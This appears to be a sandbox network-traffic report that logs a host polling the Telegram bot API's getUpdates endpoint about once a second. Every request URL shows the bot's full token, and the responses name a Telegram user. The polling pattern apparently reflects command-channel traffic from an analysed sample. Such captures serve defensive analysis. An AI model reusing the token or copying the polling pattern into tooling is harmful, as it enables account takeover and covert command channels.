                                                                                        2024-06-05 01:57:46 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        55192.168.2.449816149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:46 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:47 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:46 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:47 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        56192.168.2.449817149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:48 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:48 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:48 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:48 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        57192.168.2.449818149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:48 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:49 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:49 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:49 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        58192.168.2.449819149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:50 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:50 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:50 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:50 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        59192.168.2.449820149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:51 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:51 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:51 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:51 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        60192.168.2.449821149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:52 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:52 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:52 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:52 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        61192.168.2.449822149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:53 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:53 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:53 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:53 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        62192.168.2.449823149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:54 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:54 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:54 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:54 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        63192.168.2.449824149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:55 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:55 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:55 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:55 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        64192.168.2.449825149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:56 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:56 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:56 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:56 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        65192.168.2.449826149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:57 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:57 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:57 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:57 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        66192.168.2.449827149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:58 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:58 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:58 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:58 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
